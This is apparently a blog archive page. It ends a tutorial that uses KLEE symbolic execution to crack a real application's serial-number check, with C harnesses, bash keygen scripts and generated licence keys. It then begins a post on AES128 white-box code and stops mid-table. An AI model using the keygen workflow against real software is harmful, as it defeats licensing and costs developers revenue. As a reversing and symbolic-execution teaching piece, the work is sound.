For those who are wondering if get_index_in_mail_table could return a negative index, and so possibly crash the program I can answer that they are not alone. @0vercl0k asked me the same question, and unfortunately I have to answer a no. I tried, because I am a lazy ass, by changing the assertion above to klee_assert(index < 0), but it was not triggered by KLEE. I then manually checked the function's code and I saw a beautiful if (result < 0) result = 0. So, the answer is no! You have not found a vulnerability in the application :(

For the check_mail solution we have to provide the index of a serial, but wait... we have it! We have now a serial, so, computing the index of the table is simple as executing this:

int index = get_index_in_mail_table(serial);

Therefore, given a serial number, we can solve the mail address in this way:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    char mail[10];

    // mail is symbolic
    klee_make_symbolic(mail, sizeof(mail), "mail");
    for (i = 0; i < sizeof(mail) - 1; ++i)
    {
        c = mail[i];
        klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
    }
    klee_assume(mail[sizeof(mail) - 1] == '\0');

    // get serial as external input
    if (argc < 2)
        return 1;
    serial = atoi(argv[1]);

    // compute index
    index = get_index_in_mail_table(serial);
    // check validity
    valid = check_mail(mail, index);
    klee_assert(!valid);
}

We only have to run KLEE with the additional serial argument, providing the computed one by the previous step.

$ clang -emit-llvm -g -o mail.ll -c mail.c
$ klee --optimize --libc=uclibc --posix-runtime mail.ll 120300641
...
KLEE: ERROR: /work/symbolic/mail.c:34: ASSERTION FAIL: !valid
...
$ ls klee-last/ | grep err
test000023.assert.err
$ ktest-tool klee-last/test000023.ktest 
...
object    1: name: 'mail'
object    1: data: 'yrwt\x00\x00\x00\x00\x00\x00'
...

OK, the mail found by KLEE is "yrwt". This is not a mail, of course, but in the code there is not a proper validation imposing the presence of '@' and '.' chars, so we are fine with it :)

The last piece of the puzzle we need is the customer number. Here is the check:

int expected_customer = compute_customer_number(serial, mail);
if (expected_customer != customer_num)
    return INVALID;

This is simpler than before, since we already have a serial and a mail, so the only thing missing is a customer number matching those. We can compute it directly, even without symbolic execution:

int main(int argc, char* argv[])
{
    if (argc < 3)
        return 1;

    int serial = atoi(argv[1]);
    char* mail = argv[2];
    int customer_number = compute_customer_number(serial, mail);
    printf("%d\n", customer_number);
    return 0;
}

Let's execute it:

$ gcc customer.c customer
$ ./customer 120300641 yrwt
1175211979

Yeah! And if we try those numbers and mail address onto the real program, we are now legit and registered users :)

Want more keys?

We have just found one key, and that's cool, but what about making a keygen? KLEE is deterministic, so if you run the same code over and over you will get always the same results. So, we are now stuck with this single serial.

To solve the problem we have to think about what variables we can move around to get different valid serial numbers to start with, and with them solve related mail addresses and compute a customer number.

We have to add constraints to the serial generation, so that every time we can run a slightly different version of the program and get a different serial number. The simplest thing to do is to constraint get_index_in_mail_table to return an index inside a proper subset of the range [0, HEADER_SIZE] used before. For example we can divide it in equal chunks of size 5 and run the whole thing for every chunk.

This is the modified version of the serial generation:

int main(int argc, char* argv[]) {
    int serial, min_index, max_index, valid;

    // get chunk bounds as external inputs
    if (argc < 3)
        return 1;
    min_index= atoi(argv[1]);
    max_index= atoi(argv[2]);

    // check and assert
    index = get_index_in_mail_table(serial);
    valid = index >= min_index && index < max_index;
    klee_assert(!valid);
    return 0;
}

We now need a script that runs KLEE and collect the results for all those chunks. Here it is:

#!/bin/bash

MIN_INDEX=0
MAX_INDEX=8033
STEP=5

echo "Index;License;Mail;Customer"

for INDEX in $(seq $MIN_INDEX $STEP $MAX_INDEX); do
    echo -n "$INDEX;"

    CHUNK_MIN=$INDEX
    CHUNK_MAX=$(( CHUNK_MIN + STEP ))
    LICENSE=$(./solve.sh serial.ll $CHUNK_MIN $CHUNK_MAX)
    if [ -z "$LICENSE" ]; then
        echo ";;"
        continue
    fi
    MAIL_ARRAY=$(./solve.sh mail.ll $LICENSE)
    if [ -z "$MAIL_ARRAY" ]; then
        echo ";;"
        continue
    fi
    MAIL=$(sed 's/\\x00//g' <<< $MAIL_ARRAY | sed "s/'//g")
    CUSTOMER=$(./customer $LICENSE $MAIL)

    echo "$LICENSE;$MAIL;$CUSTOMER"
done

This script uses the solve.sh script, that does the actual work and prints the result of KLEE runs:

#!/bin/bash
# do work
klee $@ >/dev/null 2>&1
# print result
ASSERT_FILE=$(ls klee-last | grep .assert.err)
TEST_FILE=$(basename klee-last/$ASSERT_FILE .assert.err)
OUTPUT=$(ktest-tool --write-ints klee-last/$TEST_FILE.ktest | grep data)
RESULT=$(sed 's/.*:.*: //' <<< $OUTPUT)
echo $RESULT
# cleanup
rm -rf $(readlink -f klee-last)
rm -f klee-last

Here is the final run:

$ ./keygen_all.sh
Index;License;Mail;Customer
...
2400;;;
2405;115019227;4h79;1162863222
2410;112625605;7cxd;554797040
...

Note that not all the serial numbers are solvable, but we are OK with that. We now have a bunch of solved registrations. We can put them in some simple GUI that exposes to the user one of them randomly.

That's all folks.

Conclusion

This was a brief journey into the magic world of reversing and symbolic execution. We started with the dream to make a key generator for a real world application, and we've got a list of serial numbers to put in some nice GUI (maybe with some MIDI soundtrack playing in the background to make users crazy). But this was not our purpose. The path we followed is far more interesting than ruining programmer's life. So, just to recap, here are the main steps we followed to generate our serial numbers:

  1. reverse the skeleton of the serial number validation procedure, understanding data and the most important functions, using a debugger, IDA, and all the reversing tools we can access;
  2. collect the functions and produce a C version of them (this could be quite difficult, unless you have access to HEX-Rays decompiler or similar tool);
  3. mark some strategic variable as symbolic and mark some strategic code path with an assert;
  4. ask KLEE to provide us the values for symbolic variables that make the assert to fail, and so to reach that code path;
  5. since the last step provides us only a single serial number, add an external input to the symbolic program, using it as additional constraint, in order to get different values for symbolic variables reaching the assert.

The last point can be seen as quite obscure, I can admit that, but the idea is simple. Since KLEE's goal is to reach a path with some values for the symbolic variables, it is not interested in exploring all the possibilities for those values. We can force this exploration manually, by adding an additional constraint, and varying a parameter from run to run, and get (hopefully) different correct values for our serial number.

I would like to thank @0vercl0k, @jonathansalwan and @__x86 for their careful proofreading and good remarks!

I hope you found this topic interesting. In the case, here are some links that can be useful for you to deepen some of the arguments touched in this post:

Source code, examples and scripts used to produce this blog post are published in this GitHub repo.

Cheers, @brt_device.

Spotlight on an unprotected AES128 white-box implementation

Introduction

I think it all began when I've worked on the NSC2013 crackme made by @elvanderb, long story short you had an AES128 heavily obfuscated white-box implementation to break. The thing was you could actually solve the challenge in different ways:

  1. the first one was the easiest one: you didn't need to know anything about white-box, crypto or even AES ; you could just see the function as a black-box & try to find "design flaws" in its inner-workings
  2. the elite way: this one involved to understand & recover the entire design of the white-box, then to identify design weaknesses that allows the challenger to directly attack & recover the encryption key. A really nice write-up has been recently written by @doegox, check it out, really :): Oppida/NoSuchCon challenge.

The annoying thing is that you don't have a lot of understandable available C code on the web that implement such things, nevertheless you do have quite some nice academic references ; they are a really good resource to build your own.

This post aims to present briefly, in a simple way what an AES white-box looks like, and to show how its design is important if you want to not have your encryption key extracted :). The implementation I'm going to talk about today is not my creation at all, I just followed the first part (might do another post talking about the second part? Who knows) of a really nice paper (even for non-mathematical / crypto guys like me!) written by James A. Muir.

The idea is simple: we will start from a clean AES128 encryption function in plain C, we will modify it & transform it into a white-box implementation in several steps. As usual, all the code are available on my github account; you are encourage to break & hack them!

Of course, we will use this post to briefly present what is the white-box cryptography, what are the goals & why it's kind of cool.

Before diving deep, here is the table of contents:

AES128

Introduction

All right, here we are: this part is just a reminder of how AES (with a 128 bits key) roughly works. If you know that already, feel free to go to the next level. Basically in here I just want us to build our first function: a simple block encryption. The signature of the function will be something, as you expect, like this:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])

The encryption works in eleven rounds, the first one & the last one are slightly different than the nine others ; but they all rely on four different operations. Those operations are called: AddRoundKey, SubBytes, ShiftRows, MixColumns. Each round modifies a 128 bits state with a 128 bits round-key. Those round-keys are generated from the encryption key after a key expansion (called key schedule) function. Note that the first round-key is actually the encryption key.

The first part of an AES encryption is to execute the key schedule in order to get our round-keys ; once we have them all it's just a matter of using the four different operations we saw to generate the encrypted plain-text.

I know that I quite like to see how crypto algorithms work in a visual way, if this is also your case check this SWF animation (no exploit in here, don't worry :)): Rijndael_Animation_v4_eng.swf ; else you can also read the FIPS-197 document.

Key schedule

The key schedule is like the most important part of the algorithm. As I said a bit earlier, this function is a derivation one: it takes the encryption key as input and will generate the round-keys the encryption process will use as output.

I don't really feel like explaining in detail how it works (as it is a bit tricky to explain that with words), I would rather advise you to read the FIPS document or to follow the flash animation. Here is what my key schedule looks like:

// aes key schedule
const unsigned char S_box[] = { 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 };
#define DW(x) (*(unsigned int*)(x))
void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }
}

Sweet, feel free to dump the round keys and to compare them with an official test vector to convince you that this thing works. Once we have that function, we need to build the different primitives that the core encryption algorithm will use & reuse to generate the encrypted block. Some of them are like 1 line of C, really simple ; some others are a bit more twisted, but whatever.

Encryption process

Transformations

AddRoundKey

This one is a really simple one: it takes a round key (according to which round you are currently in), the state & you xor every single byte of the state with the round-key.

void AddRoundKey(unsigned char roundkey[16], unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] ^= roundkey[i];
}

SubBytes

Another simple one: it takes the state as input & will substitute every byte using the forward substitution box S_box.

void SubBytes(unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] = S_box[out[i]];
}

If you are interested in how the values of the S_box are computed, you should read the following blogpost AES SBox and ParisGP written by my mate @kutioo.

ShiftRows

This operation is a bit less tricky, but still is fairly straightforward. Imagine that the state is a 4x4 matrix, you just have to left rotate the second line by 1 byte, the third one by 2 bytes & finally the last one by 3 bytes. This can be done in C like this:

__forceinline void ShiftRows(unsigned char out[16])
{
    // +----+----+----+----+
    // | 00 | 04 | 08 | 12 |
    // +----+----+----+----+
    // | 01 | 05 | 09 | 13 |
    // +----+----+----+----+
    // | 02 | 06 | 10 | 14 |
    // +----+----+----+----+
    // | 03 | 07 | 11 | 15 |
    // +----+----+----+----+
    unsigned char tmp1, tmp2;

    tmp1 = out[1];
    out[1] = out[5];
    out[5] = out[9];
    out[9] = out[13];
    out[13] = tmp1;

    tmp1 = out[2];
    tmp2 = out[6];
    out[2] = out[10];
    out[6] = out[14];
    out[10] = tmp1;
    out[14] = tmp2;

    tmp1 = out[3];
    out[3] = out[15];
    out[15] = out[11];
    out[11] = out[7];
    out[7] = tmp1;
}

MixColumns

I guess this one is the less trivial one to implement & understand. But basically it is a "matrix multiplication" (in GF(2^8) though hence the double-quotes) between 4 bytes of the state (row matrix) against a fixed 4x4 matrix. That gives you 4 new state bytes, so you do that for every double-words of your state.

Now, I kind of cheated for my implementation: instead of implementing the "weird" multiplication, I figured I could use a pre-computed table instead to avoid all the hassle. Because the fixed matrix has only 3 different values (1, 2 & 3) the final table has a really small memory footprint: 3*0x100 bytes basically (if I'm being honest I even stole this table from @elvanderb's crazy white-box generator).

const unsigned char gmul[3][0x100] = {
    { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
    { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
    { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
};

Once you have this magic table, the multiplication gets really easy. Let's take an example:

mixcolumn_example.png
As I said, the four bytes at the left are from your state & the 4x4 matrix is the fixed one (filled only with 3 different values). To have the result of this multiplication you just have to execute this:
reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])

The first indexes in the table are the actual values taken from the 4x4 matrix minus one (because our array is going to be addressed from index 0). So then you can declare your own 4x4 matrix with proper indexes & do the multiplication four times:

void MixColumns(unsigned char out[16])
{
    const unsigned char matrix[16] = {
        1, 2, 0, 0,
        0, 1, 2, 0,
        0, 0, 1, 2,
        2, 0, 0, 1
    },

    /// In[19]: reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])
    /// Out[19] : 4
    /// In [20]: reduce(operator.xor, [gmul[0][0xd4], gmul[1][0xbf], gmul[2][0x5d], gmul[0][0x30]])
    /// Out[20]: 102

    gmul[3][0x100] = {
        { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 